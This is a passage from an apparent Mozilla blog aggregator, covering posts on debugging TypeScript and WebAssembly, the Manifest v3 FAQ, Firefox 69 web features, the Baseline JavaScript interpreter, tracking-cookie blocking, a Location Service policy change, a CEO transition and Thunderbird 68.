See, the Scopes panel shows the localeTime variable now (and yes, the magic comes from the source map).

Finally, if you are interested in where the e variable comes from, jump into the generated location using the context menu (like we just did in the previous example).

DevTools showing Debugger panel using the context menu to locate the e variable

Stay tuned for more upcoming Debugger features!

Jan ‘Honza’ Odvarko

The post Debugging TypeScript in Firefox DevTools appeared first on Mozilla Hacks - the Web developer blog.

hacks.mozilla.orgDebugging WebAssembly Outside of the Browser

WebAssembly has begun to establish itself outside of the browser via dedicated runtimes like Mozilla’s Wasmtime and Fastly’s Lucet. While the promise of a new, universal format for programs is appealing, it also comes with new challenges. For instance, how do you debug .wasm binaries?

At Mozilla, we’ve been prototyping ways to enable source-level debugging of .wasm files using traditional tools like GDB and LLDB.

The screencast below shows an example debugging session. Specifically, it demonstrates using Wasmtime and LLDB to inspect a program originally written in Rust, but compiled to WebAssembly.

This type of source-level debugging was previously impossible. And while the implementation details are subject to change, the developer experience—attaching a normal debugger to Wasmtime—will remain the same.

By allowing developers to examine programs in the same execution environment as a production WebAssembly program, Wasmtime’s debugging support makes it easier to catch and diagnose bugs that may not arise in a native build of the same code. For example, the WebAssembly System Interface (WASI) treats filesystem access more strictly than traditional Unix-style permissions. This could create issues that only manifest in WebAssembly runtimes.

Mozilla is proactively working to ensure that WebAssembly’s development tools are capable, complete, and ready to go as WebAssembly expands beyond the browser.

Please try it out and let us know what you think.

Note: Debugging using Wasmtime and LLDB should work out of the box on Linux with Rust programs, or with C/C++ projects built via the WASI SDK.

Debugging on macOS currently requires building and signing a more recent version of LLDB.

Unfortunately, LLDB for Windows does not yet support JIT debugging.

Thanks to Lin Clark, Till Schneidereit, and Yury Delendik for their assistance on this post, and for their work on WebAssembly debugging.

The post Debugging WebAssembly Outside of the Browser appeared first on Mozilla Hacks - the Web developer blog.

SeaMonkeyPost-release post…


SeaMonkey is currently as far behind the release schedule (rapid release or otherwise).  Mozilla isn’t making it easier for us to release things; but, hopefully we’ll be under our own release schedule (if we’re not already) for Mozilla to have any affect on us.

That said, I can’t help but feel that I’ve dropped the proverbial ball  on this release.    I’d like to personally offer my own apologies for the delay.  It’s entirely and wholy my fault and not the fault of the other devs.   I have a lot of ideas to get things working again; but, I’m hoping I’ll get the chance to do what I’ve set out to do for SeaMonkey.

Yours truly,


SeaMonkeySeaMonkey 2.49.5 has been released!

Hi Everyone.

2.49.5 was just ‘released’ (aka pushed to the releases/2.49.5) portion of archive.mozilla.org.

It has been an intensely frustrating experience, and dare I say worse than 2.46’s release.  I can’t imagine how much everyone is wanting to kick me off the team…

I’m still working on making the release process ‘smoother’, but it’s a very steep uphill battle (dare I even quote Richie from “Bottoms”..  “Steep?  It’s F’ing vertical!”)

That said…  I’ve got some time to fix this whole smegging smegfest..

Yours honestly,


Mozilla Add-ons BlogMozilla’s Manifest v3 FAQ

What is Manifest v3?

Chrome versions the APIs they provide to extensions, and the current format is version 2. The Firefox WebExtensions API is nearly 100% compatible with version 2, allowing extension developers to easily target both browsers.

In November 2018, Google proposed an update to their API, which they called Manifest v3. This update includes a number of changes that are not backwards-compatible and will require extension developers to take action to remain compatible.

A number of extension developers have reached out to ask how Mozilla plans to respond to the changes proposed in v3. Following are answers to some of the frequently asked questions.

Why do these changes negatively affect content blocking extensions?

One of the proposed changes in v3 is to deprecate a very powerful API called blocking webRequest. This API gives extensions the ability to intercept all inbound and outbound traffic from the browser, and then block, redirect or modify that traffic.

In its place, Google has proposed an API called declarativeNetRequest. This API impacts the capabilities of content blocking extensions by limiting the number of rules, as well as available filters and actions. These limitations negatively impact content blockers because modern content blockers are very sophisticated and employ layers of algorithms to not only detect and block ads, but to hide from the ad networks themselves. Extensions would still be able to use webRequest but only to observe requests, not to modify or block them.

As a result, some content blocking extension developers have stated they can no longer maintain their add-on if Google decides to follow through with their plans. Those who do continue development may not be able to provide the same level of capability for their users.

Will Mozilla follow Google with these changes?

In the absence of a true standard for browser extensions, maintaining compatibility with Chrome is important for Firefox developers and users. Firefox is not, however, obligated to implement every part of v3, and our WebExtensions API already departs in several areas under v2 where we think it makes sense.

Content blocking: We have no immediate plans to remove blocking webRequest and are working with add-on developers to gain a better understanding of how they use the APIs in question to help determine how to best support them.

Background service workers: Manifest v3 proposes the implementation of service workers for background processes to improve performance. We are currently investigating the impact of this change, what it would mean for developers, and whether there is a benefit in continuing to maintain background pages.

Runtime host permissions: We are evaluating the proposal in Manifest v3 to give users more granular control over the sites they give permissions to, and investigating ways to do so without too much interruption and confusion.

Cross-origin communication: In Manifest v3, content scripts will have the same permissions as the page they are injected in. We are planning to implement this change.

Remotely hosted code: Firefox already does not allow remote code as a policy. Manifest v3 includes a proposal for additional technical enforcement measures, which we are currently evaluating and intend to also enforce.

Will my extensions continue to work in Manifest v3?

Google’s proposed changes, such as the use of service workers in the background process, are not backwards-compatible. Developers will have to adapt their add-ons to accommodate these changes.

That said, the changes Google has proposed are not yet stabilized. Therefore, it is too early to provide specific guidance on what to change and how to do so. Mozilla is waiting for more clarity and has begun investigating the effort needed to adapt.

We will provide ongoing updates about changes necessary on the add-ons blog.

What is the timeline for these changes?

Given Manifest v3 is still in the draft and design phase, it is too early to provide a specific timeline. We are currently investigating what level of effort is required to make the changes Google is proposing, and identifying where we may depart from their plans.

Later this year we will begin experimenting with the changes we feel have a high chance of being part of the final version of Manifest v3, and that we think make sense for our users. Early adopters will have a chance to test our changes in the Firefox Nightly and Beta channels.

Once Google has finalized their v3 changes and Firefox has implemented the parts that make sense for our developers and users, we will provide ample time and documentation for extension developers to adapt. We do not intend to deprecate the v2 API before we are certain that developers have a viable path forward to migrate to v3.

Keep your eyes on the add-ons blog for updates regarding Manifest v3 and some of the other work our team is up to. We welcome your feedback on our community forum.


hacks.mozilla.orgFirefox 69 — a tale of Resize Observer, microtasks, CSS, and DevTools

For our latest excellent adventure, we’ve gone and cooked up a new Firefox release. Version 69 features a number of nice new additions including JavaScript public instance fields, the Resize Observer and Microtask APIs, CSS logical overflow properties (e.g. overflow-block), and @supports for selectors.

We will also look at highlights from the raft of new debugging features in the Firefox 69 DevTools, including console message grouping, event listener breakpoints, and text label checks.

This blog post provides merely a set of highlights; for all the details, check out the following:

The new CSS

Firefox 69 supports a number of new CSS features; the most interesting are as follows.

New logical properties for overflow

69 sees support for some new logical propertiesoverflow-block and overflow-inline — which control the overflow of an element’s content in the block or inline dimension respectively.

These properties map to overflow-x or overflow-y, depending on the content’s writing-mode. Using these new logical properties instead of overflow-x and overflow-y makes your content easier to localize, especially when adapting it to languages using a different writing direction. They can also take the same values — visible, hidden, scroll, auto, etc.

Note: Look at Handling different text directions if you want to read up on these concepts.

@supports for selectors

The @supports at-rule has long been very useful for selectively applying CSS only when a browser supports a particular property, or doesn’t support it.

Recently this functionality has been extended so that you can apply CSS only if a particular selector is or isn’t supported. The syntax looks like this:

@supports selector(selector-to-test) {
  /* insert rules here */

We are supporting this functionality by default in Firefox 69 onwards. Find some usage examples here.

JavaScript gets public instance fields

The most interesting addition we’ve had to the JavaScript language in Firefox 69 is support for public instance fields in JavaScript classes. This allows you to specify properties you want the class to have up front, making the code more logical and self-documenting, and the constructor cleaner. For example:

class Product {
  tax = 0.2;
  basePrice = 0;

  constructor(name, basePrice) {
    this.name = name;
    this.basePrice = basePrice;
    this.price = (basePrice * (1 + this.tax)).toFixed(2);

Notice that you can include default values if wished. The class can then be used as you’d expect:

let bakedBeans = new Product('Baked Beans', 0.59);
console.log(`${bakedBeans.name} cost $${bakedBeans.price}.`);

Private instance fields (which can’t be set or referenced outside the class definition) are very close to being supported in Firefox, and also look to be very useful. For example, we might want to hide the details of the tax and base price. Private fields are indicated by a hash symbol in front of the name:

#tax = 0.2;
 #basePrice = 0;

The wonder of WebAPIs

There are a couple of new WebAPIs enabled by default in Firefox 69. Let’s take a look.

Resize Observer

Put simply, the Resize Observer API allows you to easily observe and respond to changes in the size of an element’s content or border box. It provides a JavaScript solution to the often-discussed lack of “element queries” in the web platform.

A simple trivial example might be something like the following (resize-observer-border-radius.html, see the source also), which adjusts the border-radius of a <div> as it gets smaller or bigger:

const resizeObserver = new ResizeObserver(entries => {
  for (let entry of entries) {
    if(entry.contentBoxSize) {
      entry.target.style.borderRadius = Math.min(100, (entry.contentBoxSize.inlineSize/10) +
                                                      (entry.contentBoxSize.blockSize/10)) + 'px';
    } else {
      entry.target.style.borderRadius = Math.min(100, (entry.contentRect.width/10) +
                                                      (entry.contentRect.height/10)) + 'px';


“But you can just use border-radius with a percentage”, I hear you cry. Well, sort of. But that quickly leads to ugly-looking elliptical corners, whereas the above solution gives you nice square corners that scale with the box size.

Another, slightly less trivial example is the following (resize-observer-text.html , see the source also):

if(window.ResizeObserver) {
  const h1Elem = document.querySelector('h1');
  const pElem = document.querySelector('p');
  const divElem = document.querySelector('body > div');
  const slider = document.querySelector('input');

  divElem.style.width = '600px';

  slider.addEventListener('input', () => {
    divElem.style.width = slider.value + 'px';

  const resizeObserver = new ResizeObserver(entries => {
    for (let entry of entries) {
        if(entry.contentBoxSize) {
            h1Elem.style.fontSize = Math.max(1.5, entry.contentBoxSize.inlineSize/200) + 'rem';
            pElem.style.fontSize = Math.max(1, entry.contentBoxSize.inlineSize/600) + 'rem';
        } else {
            h1Elem.style.fontSize = Math.max(1.5, entry.contentRect.width/200) + 'rem';
            pElem.style.fontSize = Math.max(1, entry.contentRect.width/600) + 'rem';


Here we use the resize observer to change the font-size of a header and paragraph as a slider’s value is changed, causing the containing <div> to change its width. This shows that you can respond to changes in an element’s size, even if they have nothing to do with the viewport size changing.

So to summarise, Resize Observer opens up a wealth of new responsive design work that was difficult with CSS features alone. We’re even using it to implement a new responsive version of our new DevTools JavaScript console!.


The Microtasks API provides a single method — queueMicrotask(). This is a low-level method that enables us to directly schedule a callback on the microtask queue. This schedules code to be run immediately before control returns to the event loop so you are assured a reliable running order (using setTimeout(() => {}, 0)) for example can give unreliable results).

The syntax is as simple to use as other timing functions:

self.queueMicrotask(() => {
  // function contents here

The use cases are subtle, but make sense when you read the explainer section in the spec. The biggest benefactors here are framework vendors, who like lower-level access to scheduling. Using this will reduce hacks and make frameworks more predictable cross-browser.

Developer tools updates in 69

There are various interesting additions to the DevTools in 69, so be sure to go and check them out!

Event breakpoints and async functions in the JS debugger

The JavaScript debugger has some cool new features for stepping through and examining code:

New remote debugging

In the new shiny about:debugging page, you’ll find a grouping of options for remotely debugging devices, with more to follow in the future. In 69, we’ve enabled a new mechanism for allowing you to remotely debug other versions of Firefox, on the same machine or other machines on the same network (see Network Location).

Console message grouping

In the console, we now group together similar error messages, with the aim of making the console tidier, spamming developers less, and making them more likely to pay attention to the messages. In turn, this can have a positive effect on security/privacy.

The new console message grouping looks like this, when in its initial closed state:

When you click the arrow to open the message list, it shows you all the individual messages that are grouped:

Initially the grouping occurs on CSP, CORS, and tracking protection errors, with more categories to follow in the future.

Flex information in the picker infobar

Next up, we’ll have a look at the Page inspector. When using the picker, or hovering over an element in the HTML pane, the infobar for the element now shows when it is a flex container, item, or both.

website nav menu with infobar pointing out that it is a flex item

See this page for more details.

Text Label Checks in the Accessibility Inspector

A final great feature to mention is the new text label checks feature of the Accessibility Inspector.

When you choose Check for issues > Text Labels from the dropdown box at the top of the accessibility inspector, it marks all the nodes in the accessibility tree with a warning sign if it is missing a descriptive text label. The Checks pane on the right hand side then gives a description of the problem, along with a Learn more link that takes you to more detailed information available on MDN.

WebExtensions updates

Last but not least, Let’s give a mention to WebExtensions! The main feature to make it into Firefox 69 is User Scripts — these are a special kind of extension content script that, when registered, instruct the browser to insert the given scripts into pages that match the given URL patterns.

See also

In this post we’ve reviewed the main web platform features added in Firefox 69. You can also read up on the main new features of the Firefox browser — see the Firefox 69 Release Notes.

The post Firefox 69 — a tale of Resize Observer, microtasks, CSS, and DevTools appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogToday’s Firefox Blocks Third-Party Tracking Cookies and Cryptomining by Default

Today, Firefox on desktop and Android will — by default — empower and protect all our users by blocking third-party tracking cookies and cryptominers. This milestone marks a major step in our multi-year effort to bring stronger, usable privacy protections to everyone using Firefox.

Firefox’s Enhanced Tracking Protection gives users more control

For today’s release, Enhanced Tracking Protection will automatically be turned on by default for all users worldwide as part of the ‘Standard’ setting in the Firefox browser and will block known “third-party tracking cookies” according to the Disconnect list. We first enabled this default feature for new users in June 2019. As part of this journey we rigorously tested, refined, and ultimately landed on a new approach to anti-tracking that is core to delivering on our promise of privacy and security as central aspects of your Firefox experience.

Currently over 20% of Firefox users have Enhanced Tracking Protection on. With today’s release, we expect to provide protection for 100% of ours users by default. Enhanced Tracking Protection works behind-the-scenes to keep a company from forming a profile of you based on their tracking of your browsing behavior across websites — often without your knowledge or consent. Those profiles and the information they contain may then be sold and used for purposes you never knew or intended. Enhanced Tracking Protection helps to mitigate this threat and puts you back in control of your online experience.

You’ll know when Enhanced Tracking Protection is working when you visit a site and see a shield icon in the address bar:


When you see the shield icon, you should feel safe that Firefox is blocking thousands of companies from your online activity.

For those who want to see which companies we block, you can click on the shield icon, go to the Content Blocking section, then Cookies. It should read Blocking Tracking Cookies. Then, click on the arrow on the right hand side, and you’ll see the companies listed as third party cookies that Firefox has blocked:

If you want to turn off blocking for a specific site, click on the Turn off Blocking for this Site button.

Protecting users’ privacy beyond tracking cookies

Cookies are not the only entities that follow you around on the web, trying to use what’s yours without your knowledge or consent. Cryptominers, for example, access your computer’s CPU, ultimately slowing it down and draining your battery, in order to generate cryptocurrency — not for yours but someone else’s benefit. We introduced the option to block cryptominers in previous versions of Firefox Nightly and Beta and are including it in the ‘Standard Mode‘ of your Content Blocking preferences as of today.

Another type of script that you may not want to run in your browser are Fingerprinting scripts. They harvest a snapshot of your computer’s configuration when you visit a website. The snapshot can then also be used to track you across the web, an issue that has been present for years. To get protection from fingerprinting scripts Firefox users can turn on ‘Strict Mode.’ In a future release, we plan to turn fingerprinting protections on by default.

Also in today’s Firefox release

To see what else is new or what we’ve changed in today’s release, you can check out our release notes.

Check out and download the latest version of Firefox available here.

The post Today’s Firefox Blocks Third-Party Tracking Cookies and Cryptomining by Default appeared first on The Mozilla Blog.

Mozilla ServicesA New Policy for Mozilla Location Service

Several years ago we started a geolocation experiment called the Mozilla Location Service (MLS) to create a location service built on open-source software and powered through crowdsourced location data. MLS provides geolocation lookups based on publicly observable cell tower and WiFi access point information. MLS has served the public interest by providing location information to open-source operating systems, research projects, and developers.

Today Mozilla is announcing a policy change regarding MLS. Our new policy will impose limits on commercial use of MLS. Mozilla has not made this change by choice. Skyhook Holdings, Inc. contacted Mozilla some time ago and alleged that MLS infringed a number of its patents. We subsequently reached an agreement with Skyhook that avoids litigation. While the terms of the agreement are confidential, we can tell you that the agreement exists and that our MLS policy change relates to it. We can also confirm that this agreement does not change the privacy properties of our service: Skyhook does not receive location data from Mozilla or our users.

Our new policy preserves the public interest heart of the MLS project. Mozilla has never offered any commercial plans for MLS and had no intention to do so. Only a handful of entities have made use of MLS API Query keys for commercial ventures. Nevertheless, we regret having to impose new limits on MLS. Sometimes companies have to make difficult choices that balance the massive cost and uncertainty of patent litigation against other priorities.

Mozilla has long argued that patents can work to inhibit, rather than promote, innovation. We continue to believe that software development, and especially open-source software, is ill-served by the patent system. Mozilla endeavors to be a good citizen with respect to patents. We offer a free license to our own patents under the Mozilla Open Software Patent License Agreement. We will also continue our advocacy for a better patent system.

Under our new policy, all users of MLS API Query keys must apply.  Non-commercial users (such as academic, public interest, research, or open-source projects) can request an MLS API Query key capped at a daily usage limit of 100,000. This limit may be increased on request. Commercial users can request an MLS API Query key capped at a daily usage limit of 100,000. The daily limit cannot be increased for commercial uses and those keys will expire after 3 months. In effect, commercial use of MLS will now be of limited duration and restricted in volume.

Existing keys will expire on March 1, 2020. We encourage non-commercial users to re-apply for continued use of the service. Keys for a small number of commercial users that have been exceeding request limits will expire sooner. We will reach out to those users directly.

Location data and services are incredibly valuable in today’s connected world. We will continue to provide an open-source and privacy respecting location service in the public interest. You can help us crowdsource data by opting-in to the contribution option in our Android mobile browser.

about:communityFirefox 69 new contributors

With the release of Firefox 69, we are pleased to welcome the 50 developers who contributed their first code change to Firefox in this release, 39 of whom were brand new volunteers! Please join us in thanking each of these diligent and enthusiastic individuals, and take a look at their contributions:

hacks.mozilla.orgThe Baseline Interpreter: a faster JS interpreter in Firefox 70


Modern web applications load and execute a lot more JavaScript code than they did just a few years ago. While JIT (just-in-time) compilers have been very successful in making JavaScript performant, we needed a better solution to deal with these new workloads.

To address this, we’ve added a new, generated JavaScript bytecode interpreter to the JavaScript engine in Firefox 70. The interpreter is available now in the Firefox Nightly channel, and will go to general release in October. Instead of writing or generating a new interpreter from scratch, we found a way to do this by sharing most code with our existing Baseline JIT.

The new Baseline Interpreter has resulted in performance improvements, memory usage reductions and code simplifications. Here’s how we got there:

Execution tiers

In modern JavaScript engines, each function is initially executed in a bytecode interpreter. Functions that are called a lot (or perform many loop iterations) are compiled to native machine code. (This is called JIT compilation.)

Firefox has an interpreter written in C++ and multiple JIT tiers:

  • The Baseline JIT. Each bytecode instruction is compiled directly to a small piece of machine code. It uses Inline Caches (ICs) both as performance optimization and to collect type information for Ion.
  • IonMonkey (or just Ion), the optimizing JIT. It uses advanced compiler optimizations to generate fast code for hot functions (at the expense of slower compile times).

Ion JIT code for a function can be ‘deoptimized’ and thrown away for various reasons, for example when the function is called with a new argument type. This is called a bailout. When a bailout happens, execution continues in the Baseline code until the next Ion compilation.

Until Firefox 70, the execution pipeline for a very hot function looked like this:

Timeline showing C++ Interpreter, Baseline Compilation, Baseline JIT Code, Prepare for Ion, Ion JIT Code with an arrow (called bailout) from Ion JIT Code back to Baseline JIT Code


Although this works pretty well, we ran into the following problems with the first part of the pipeline (C++ Interpreter and Baseline JIT):

  1. Baseline JIT compilation is fast, but modern web applications like Google Docs or Gmail execute so much JavaScript code that we could spend quite some time in the Baseline compiler, compiling thousands of functions.
  2. Because the C++ interpreter is so slow and doesn’t collect type information, delaying Baseline compilation or moving it off-thread would have been a performance risk.
  3. As you can see in the diagram above, optimized Ion JIT code was only able to bail out to the Baseline JIT. To make this work, Baseline JIT code required extra metadata (the machine code offset corresponding to each bytecode instruction).
  4. The Baseline JIT had some complicated code for bailouts, debugger support, and exception handling. This was especially true where these features intersect!

Solution: generate a faster interpreter

We needed type information from the Baseline JIT to enable the more optimized tiers, and we wanted to use JIT compilation for runtime speed. However, the modern web has such large codebases that even the relatively fast Baseline JIT Compiler spent a lot of time compiling. To address this, Firefox 70 adds a new tier called the Baseline Interpreter to the pipeline:

Same timeline of execution tiers as before but now has the 'Baseline Interpreter' between C++ interpreter and Baseline compilation. The bailout arrow points to Baseline Interpreter instead of Baseline JIT Code.

The Baseline Interpreter sits between the C++ interpreter and the Baseline JIT and has elements from both. It executes all bytecode instructions with a fixed interpreter loop (like the C++ interpreter). In addition, it uses Inline Caches to improve performance and collect type information (like the Baseline JIT).

Generating an interpreter isn’t a new idea. However, we found a nice new way to do it by reusing most of the Baseline JIT Compiler code. The Baseline JIT is a template JIT, meaning each bytecode instruction is compiled to a mostly fixed sequence of machine instructions. We generate those sequences into an interpreter loop instead.

Sharing Inline Caches and profiling data

As mentioned above, the Baseline JIT uses Inline Caches (ICs) both to make it fast and to help Ion compilation. To get type information, the Ion JIT compiler can inspect the Baseline ICs.

Because we wanted the Baseline Interpreter to use exactly the same Inline Caches and type information as the Baseline JIT, we added a new data structure called JitScript. JitScript contains all type information and IC data structures used by both the Baseline Interpreter and JIT.

The diagram below shows what this looks like in memory. Each arrow is a pointer in C++. Initially, the function just has a JSScript with the bytecode that can be interpreted by the C++ interpreter. After a few calls/iterations we create the JitScript, attach it to the JSScript and can now run the script in the Baseline Interpreter.

As the code gets warmer we may also create the BaselineScript (Baseline JIT code) and then the IonScript (Ion JIT code).
JSScript (bytecode) points to JitScript (IC and profiling data). JitScript points to BaselineScript (Baseline JIT Code) and IonScript (Ion JIT code).

Note that the Baseline JIT data for a function is now just the machine code. We’ve moved all the inline caches and profiling data into JitScript.

Sharing the frame layout

The Baseline Interpreter uses the same frame layout as the Baseline JIT, but we’ve added some interpreter-specific fields to the frame. For example, the bytecode PC (program counter), a pointer to the bytecode instruction we are currently executing, is not updated explicitly in Baseline JIT code. It can be determined from the return address if needed, but the Baseline Interpreter has to store it in the frame.

Sharing the frame layout like this has a lot of advantages. We’ve made almost no changes to C++ and IC code to support Baseline Interpreter frames—they’re just like Baseline JIT frames. Furthermore, When the script is warm enough for Baseline JIT compilation, switching from Baseline Interpreter code to Baseline JIT code is a matter of jumping from the interpreter code into JIT code.

Sharing code generation

Because the Baseline Interpreter and JIT are so similar, a lot of the code generation code can be shared too. To do this, we added a templated BaselineCodeGen base class with two derived classes:

The base class has a Handler C++ template argument that can be used to specialize behavior for either the Baseline Interpreter or JIT. A lot of Baseline JIT code can be shared this way. For example, the implementation of the JSOP_GETPROP bytecode instruction (for a property access like obj.foo in JavaScript code) is shared code. It calls the emitNextIC helper method that’s specialized for either Interpreter or JIT mode.

Generating the Interpreter

With all these pieces in place, we were able to implement the BaselineInterpreterGenerator class to generate the Baseline Interpreter! It generates a threaded interpreter loop: The code for each bytecode instruction is followed by an indirect jump to the next bytecode instruction.

For example, on x64 we currently generate the following machine code to interpret JSOP_ZERO (bytecode instruction to push a zero value on the stack):

// Push Int32Value(0).
movabsq $-0x7800000000000, %r11
pushq  %r11
// Increment bytecode pc register.
addq   $0x1, %r14
// Patchable NOP for debugger support.
nopl   (%rax,%rax)
// Load the next opcode.
movzbl (%r14), %ecx
// Jump to interpreter code for the next instruction.
leaq   0x432e(%rip), %rbx
jmpq   *(%rbx,%rcx,8)

When we enabled the Baseline Interpreter in Firefox Nightly (version 70) back in July, we increased the Baseline JIT warm-up threshold from 10 to 100. The warm-up count is determined by counting the number of calls to the function + the number of loop iterations so far. The Baseline Interpreter has a threshold of 10, same as the old Baseline JIT threshold. This means that the Baseline JIT has a lot less code to compile.


Performance and memory usage

After this landed in Firefox Nightly our performance testing infrastructure detected several improvements:

  • Various 2-8% page load improvements. A lot happens during page load in addition to JS execution (parsing, style, layout, graphics). Improvements like this are quite significant.
  • Many devtools performance tests improved by 2-10%.
  • Some small memory usage wins.

Note that we’ve landed more performance improvements since this first landed.

To measure how the Baseline Interpreter’s performance compares to the C++ Interpreter and the Baseline JIT, I ran Speedometer and Google Docs on Windows 10 64-bit on Mozilla’s Try server and enabled the tiers one by one. (The following numbers reflect the best of 7 runs.):
C++ Interpreter 901 ms, + Baseline Interpreter 676 ms, + Baseline JIT 633 ms
On Google Docs we see that the Baseline Interpreter is much faster than just the C++ Interpreter. Enabling the Baseline JIT too makes the page load only a little bit faster.

On the Speedometer benchmark we get noticeably better results when we enable the Baseline JIT tier. The Baseline Interpreter does again much better than just the C++ Interpreter:
C++ Interpreter 31 points, + Baseline Interpreter 52 points, + Baseline JIT 69 points
We think these numbers are great: the Baseline Interpreter is much faster than the C++ Interpreter and its start-up time (JitScript allocation) is much faster than Baseline JIT compilation (at least 10 times faster).


After this all landed and stuck, we were able to simplify the Baseline JIT and Ion code by taking advantage of the Baseline Interpreter.

For example, deoptimization bailouts from Ion now resume in the Baseline Interpreter instead of in the Baseline JIT. The interpreter can re-enter Baseline JIT code at the next loop iteration in the JS code. Resuming in the interpreter is much easier than resuming in the middle of Baseline JIT code. We now have to record less metadata for Baseline JIT code, so Baseline JIT compilation got faster too. Similarly, we were able to remove a lot of complicated code for debugger support and exception handling.

What’s next?

With the Baseline Interpreter in place, it should now be possible to move Baseline JIT compilation off-thread. We will be working on that in the coming months, and we anticipate more performance improvements in this area.


Although I did most of the Baseline Interpreter work, many others contributed to this project. In particular Ted Campbell and Kannan Vijayan reviewed most of the code changes and had great design feedback.

Also thanks to Steven DeTar, Chris Fallin, Havi Hoffman, Yulia Startsev, and Luke Wagner for their feedback on this blog post.

The post The Baseline Interpreter: a faster JS interpreter in Firefox 70 appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogThank you, Chris

Thank you, Chris.

Chris Beard has been Mozilla Corporation’s CEO for 5 and a half years. Chris has announced 2019 will be his last year in this role. I want to thank Chris from the bottom of my heart for everything he has done for Mozilla. He has brought Mozilla enormous benefits — new ideas, new capabilities, new organizational approaches. As CEO Chris has put us on a new and better path. Chris’ tenure has seen the development of important organization capabilities and given us a much stronger foundation on which to build. This includes reinvigorating our flagship web browser Firefox to be once again a best-in-class product. It includes recharging our focus on meeting the online security and privacy needs facing people today. And it includes expanding our product offerings beyond the browser to include a suite of privacy and security-focused products and services from Facebook Container and Enhanced Tracking Protection to Firefox Monitor.

Chris will remain an advisor to the board. We recognize some people may think these words are a formula and have no deep meaning. We think differently. Chris is a true “Mozillian.” He has been devoted to Mozilla for the last 15 years, and has brought this dedication to many different roles at Mozilla. When Chris left Mozilla to join Greylock as an “executive-in-residence” in 2013, he remained an advisor to Mozilla Corporation. That was an important relationship, and Chris and I were in contact when it started to become clear that Chris could be the right CEO for MoCo. So over the coming years I expect to work with Chris on mission-related topics. And I’ll consider myself lucky to do so.

One of the accomplishments of Chris’ tenure is the strength and depth of Mozilla Corporation today. The team is strong. Our organization is strong, and our future full of opportunities. It is precisely the challenges of today’s world, and Mozilla’s opportunities to improve online life, that bring so many of us to Mozilla. I personally remain deeply focused on Mozilla. I’ll be here during Chris’ tenure, and I’ll be here after his tenure ends. I’m committed to Mozilla, and to making serious contributions to improving online life and developing new technical capabilities that are good for people.

Chris will remain as CEO during the transition. We will continue to develop the work on our new engagement model, our focus on privacy and user agency. To ensure continuity, I will increase my involvement in Mozilla Corporation’s internal activities. I will be ready to step in as interim CEO should the need arise.

The Board has retained Tuck Rickards of the recruiting firm Russell Reynolds for this search. We are confident that Tuck and team understand that Mozilla products and technology bring our mission to life, and that we are deeply different than other technology companies. We’ll say more about the search as we progress.

The internet stands at an inflection point today. Mozilla has the opportunity to make significant contributions to a better internet. This is why we exist, and it’s a key time to keep doing more. We offer heartfelt thanks to Chris for leading us to this spot, and for leading the rejuvenation of Mozilla Corporation so that we are fit for this purpose, and determined to address big issues.

Mozilla’s greatest strength is the people who respond to our mission and step forward to take on the challenge of building a better internet and online life. Chris is a shining example of this. I wish Chris the absolute best in all things.

I’ll close by stating a renewed determination to find ways for everyone who seeks safe, humane and exciting online experiences to help create this better world.

The post Thank you, Chris appeared first on The Mozilla Blog.

The Mozilla BlogMy Next Chapter

Earlier this morning I shared the news internally that – while I’ve been a Mozillian for 15 years so far, and plan to be for many more years – this will be my last year as CEO.

When I returned to Mozilla just over five years ago, it was during a particularly tumultuous time in our history. Looking back it’s amazing to reflect on how far we’ve come, and I am so incredibly proud of all that our teams have accomplished over the years.

Today our products, technology and policy efforts are stronger and more resonant in the market than ever, and we have built significant new organizational capabilities and financial strength to fuel our work. From our new privacy-forward product strategy to initiatives like the State of the Internet we’re ready to seize the tremendous opportunity and challenges ahead to ensure we’re doing even more to put people in control of their connected lives and shape the future of the internet for the public good.

In short, Mozilla is an exceptionally better place today, and we have all the fundamentals in place for continued positive momentum for years to come.

It’s with that backdrop that I made the decision that it’s time for me to take a step back and start my own next chapter. This is a good place to recruit our next CEO and for me to take a meaningful break and recharge before considering what’s next for me. It may be a cliché — but I’ll embrace it — as I’m also looking forward to spending more time with my family after a particularly intense but gratifying tour of duty.

However, I’m not wrapping up today or tomorrow, but at year’s end. I’m absolutely committed to ensuring that we sustain the positive momentum we have built. Mitchell Baker and I are working closely together with our Board of Directors to ensure leadership continuity and a smooth transition. We are conducting a search for my successor and I will continue to serve as CEO through that transition. If the search goes beyond the end of the year, Mitchell will step in as interim CEO if necessary, to ensure we don’t miss a beat. And I will stay engaged for the long-term as advisor to both Mitchell and the Board, as I’ve done before.

I am grateful to have had this opportunity to serve Mozilla again, and to Mitchell for her trust and partnership in building this foundation for the future.

Over the coming months I’m excited to share with you the new products, technology and policy work that’s in development now. I am more confident than ever that Mozilla’s brightest days are yet to come.

Thoughts from Mozilla Board Members on Chris Beard’s Tenure as CEO
Chairwoman Mitchell Baker’s Reflections on Chris’ Time at Mozilla

The post My Next Chapter appeared first on The Mozilla Blog.

The Mozilla Thunderbird BlogWhat’s New in Thunderbird 68

Our newest release, Thunderbird version 68 is now available! Users on version 60, the last major release, will not be immediately updated – but will receive the update in the coming weeks. In this blog post, we’ll take a look at the features that are most noteworthy in the newest version. If you’d like to see all the changes in version 68, you can check out the release notes.

Thunderbird 68 focuses on polish and setting the stage for future releases. There was a lot of work that we had to do below the surface that has made Thunderbird more future-proof and has made it a solid base to continue to build upon. But we also managed to create some great features you can touch today.

New App Menu

Thunderbird 68 features a big update to the App Menu. The new menu is single pane with icons and separators that make it easier to navigate and reduce clutter. Animation when cycling through menu items produces a more engaging experience and results in the menu feeling more responsive and modern.

New Thunderbird Menu

Thunderbird’s New App Menu

Options/Preferences in a Tab

Thunderbird’s Options/Preferences have been converted from a dialog window to its own dedicated tab. The new Preferences tab provides more space which allows for better organized content and is more consistent with the look and feel of the rest of Thunderbird. The new Preferences tab also makes it easier to multitask without the problem of losing track of where your preferences are when switching between windows.

Preferences in a Tab

Preferences in a Tab

Full Color Support

Thunderbird now features full color support across the app. This means changing the color of the text of your email to any color you want or setting tags to any shade your heart desires.

New Full Color Picker

Full Color Support

Better Dark Theme

The dark theme available in Thunderbird has been enhanced with a dark message thread pane as well as many other small improvements.

Thunderbird Dark Theme

Thunderbird Dark Theme

Attachment Management

There are now more options available for managing attachments. You can “detach” an attachment to store it in a different folder while maintaining a link from the email to the new location. You can also open the folder containing a detached file via the “Open Containing Folder” option.

Attachment options for detached files.

Attachment options for detached files.

Filelink Improved

Filelink attachments that have already been uploaded can now be linked to again instead of having to re-upload them. Also, an account is no longer required to use the default Filelink provider – WeTransfer.

